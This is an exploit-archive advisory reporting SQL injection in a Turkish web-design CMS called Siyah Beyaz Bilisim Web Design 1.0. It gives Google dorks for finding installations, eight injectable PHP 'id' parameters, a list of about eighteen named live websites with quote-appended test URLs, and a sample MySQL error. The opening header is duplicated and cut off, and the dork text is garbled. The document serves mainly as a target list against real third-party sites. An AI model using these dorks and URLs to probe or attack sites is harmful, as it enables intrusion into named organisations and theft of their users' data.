#################################################################################################

# Exploit Title : Siyah Beyaz BiliAim Web Design 1.0 SQL Injection
# Author [ Disc #################################################################################################

# Exploit Title : Siyah Beyaz BiliAim Web Design 1.0 SQL Injection
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security
Army
# Date : 02/12/2018
# Vendor Homepage : siyahbeyazbilisim.com
# Software Download Link : N/A
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 1.0
# Exploit Risk : Medium
# # Google Dorks :
intext:''TasarA+-m ve Kodlama Siyah Beyaz BiliAim tarafA+-ndan yapA+-lmA+-AtA+-r.''
intext:''TasarA+-m ve Kodlama SiyahBeyazBiliAim tarafA+-ndan yapA+-lmA+-AtA+-r.''
# CxSecurity Exploit Link : cxsecurity.com/ascii/WLB-2018110203
# Exploit4Arab Exploit Link : exploit4arab.org/exploits/2261
# Exploit4Arab Exploit Link : exploitalert.com/view-details.html?id=31533
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL
Command ('SQL Injection') ]

#################################################################################################

# SQL Injection Exploit :

/yazi.php?id=[SQL Injection]

/resimler.php?id=[SQL Injection]

/sayfa.php?id=[SQL Injection]

/grup.php?id=[SQL Injection]

/haber.php?id=[SQL Injection]

/slider.php?id=[SQL Injection]

/sube.php?id=[SQL Injection]

/duyurular.php?id=[SQL Injection]

#################################################################################################

# Example Vulnerable Sites =>

[+] aydincdm.org/yazi.php?id=5%27 => [ Proof of Concept ] =>
archive.is/cABYo

[+] sevennakliyat.com/resimler.php?id=3%27

[+] tucanteknik.com/sayfa.php?id=110%27

[+] turenyapi.com/grup.php?id=16%27

[+] saranlar.com/sube.php?id=2%27

[+] semirauto.com/grup.php?id=1%27

[+] aydinkompresor.net/kurumsal.php?id=4%27

[+] simgepastacilik.com/grup.php?id=12%27

[+] kocarlitarispamuk.com/grup.php?id=4%27

[+] royalmarine.com.tr/grup.php?id=2%27

[+] didimsanatakademisi.com/album.php?id=12%27

[+] dundarlarparke.com/grup.php?id=6%27

[+] aykimsan.com.tr/grup.php?id=22%27

[+] lilacambalkon.com/resimler.php?id=7%27

[+] avrupakulturakademi.com/sayfa.php?id=1%27

[+] novasluxe.com/sayfa.php?id=21%27

[+] megafit.com.tr/resimler.php?id=3%27

[+] dogrugunespaneli.com/grup.php?id=6%27

#################################################################################################

# Example SQL Database Error :

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result
resource in /home/adsyb/public_html/yazi.php on line 5

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################